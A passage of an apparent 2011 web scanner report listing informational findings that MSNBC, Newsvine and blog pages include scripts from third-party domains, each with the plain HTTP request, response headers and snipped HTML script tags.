Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/wii

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /wii HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.374. http://technolog.msnbc.redacted/wikileaks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/wikileaks

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /wikileaks HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.375. http://technolog.msnbc.redacted/windows-phone-7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/windows-phone-7

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /windows-phone-7 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.376. http://technolog.msnbc.redacted/xbox previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/xbox

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://widgets.twimg.com/j/2/widget.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /xbox HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.377. http://technolog.msnbc.redacted/youtube previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/youtube

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /youtube HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.378. http://technolog2.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog2.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET / HTTP/1.1
Host: technolog2.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:53:12 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=4d47ba7c4a967234cfe2368b17e3e89b; expires=Sat, 25-Jan-2031 02:53:12 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 83448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.379. http://thebubble.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thebubble.redacted
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET / HTTP/1.1
Host: thebubble.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:36 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Connection: close
Content-Type: text/html
Content-Length: 25680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta htt
...[SNIP]...

<script src="http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...

23.380. http://theinvestedlife.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://theinvestedlife.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d743529/2/743550/randm.js
http://amch.questionmarket.com/adsc/d743529/3/743551/randm.js
http://analytics.live.com/Analytics/wlAnalytics.js

Request

GET / HTTP/1.1
Host: theinvestedlife.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=897
Content-Length: 27793
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 02:06:05 GMT
Last-Modified: Sun, 30 Jan 2011 01:51:05 GMT
Server: Microsoft-IIS/7.5
Vary: *
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:51:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/">
...[SNIP]...
<div id="wrapperTracking"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d743529/2/743550/randm.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d743529/3/743551/randm.js"></script><script type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...

23.381. http://thelastword.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thelastword.msnbc.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://lib.newsvine.com/chrome/abstractmikeblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_static/js/db9ef5fdd5fb0a36c8e130839bd46dc2a81a597a.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET / HTTP/1.1
Host: thelastword.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.382. http://timheuer.com/blog/articles/getting-started-with-silverlight-development.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://timheuer.com
Path:	/blog/articles/getting-started-with-silverlight-development.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://theloungenet.com/Server/DOTNETSL/HEUER/VERT
http://twitter.com/statuses/user_timeline/timheuer.json?callback=twitterCallback2&count=1
http://www.bing.com/bootstrap.js?market=en-US&ServId=SearchBox&ServId=SearchBoxWeb&Callback=WLSearchBoxScriptReady

Request

GET /blog/articles/getting-started-with-silverlight-development.aspx HTTP/1.1
Host: timheuer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 390459
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 29 Jan 2011 23:26:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<he
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://www.bing.com/bootstrap.js?market=en-US&ServId=SearchBox&ServId=SearchBoxWeb&Callback=WLSearchBoxScriptReady"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/timheuer.json?callback=twitterCallback2&count=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="adzerk_ad_div">
<script type="text/javascript" src="http://theloungenet.com/Server/DOTNETSL/HEUER/VERT"></script>
...[SNIP]...

23.383. http://today.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://today.msnbc.msn.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.pulse360.com/03ECD8C4-A960-11DF-9090-D37F3FF5047F
http://content.pulse360.com/288F6A98-A95B-11DF-B5E2-BA6C3FF5047F
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery
http://www.polls.newsvine.com/_vine/js/pierre?v=2442&lib=jquery&addwidgets=zinger,wetbar

Request

GET / HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: no-cache
Expires: Sat, 29 Jan 2011 23:51:37 GMT
Date: Sat, 29 Jan 2011 23:51:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 214401

<html><head><title>TODAYshow.com: Matt Lauer, Meredith Vieira, Ann Curry, Al Roker, Natalie Morales - Video, News, Recipes, Health, Pets</title><link rel="stylesheet" type="text/css" href="/css/html40
...[SNIP]...
</script><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/03ECD8C4-A960-11DF-9090-D37F3FF5047F" type="text/javascript"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/288F6A98-A95B-11DF-B5E2-BA6C3FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2442&lib=jquery&addwidgets=zinger,wetbar"></script>
...[SNIP]...

23.384. http://today.msnbc.redacted/id/37616868 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://today.msnbc.msn.com
Path:	/id/37616868

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/37616868 HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.385. http://today.msnbc.redacted/id/41319614/ns/today-entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://today.msnbc.msn.com
Path:	/id/41319614/ns/today-entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://service.collarity.com/cust/msnbc/ucs.js
http://todayshow.us.intellitxt.com/intellitxt/front.asp?ipid=10508

Request

GET /id/41319614/ns/today-entertainment/ HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.386. http://toddkenreck.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://toddkenreck.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET / HTTP/1.1
Host: toddkenreck.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:57:39 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=c66a118e1fcbecd5b536a96e40929013; expires=Sat, 25-Jan-2031 02:57:39 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 66367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.387. http://top.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://top.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET / HTTP/1.1
Host: top.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:00:36 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate,Host
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=91e5bf02a7007c2a6827929e99162d52; expires=Sat, 25-Jan-2031 03:00:36 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.388. http://top.newsvine.com/users previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://top.newsvine.com
Path:	/users

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /users HTTP/1.1
Host: top.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:58:16 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate,Host
TCN: choice
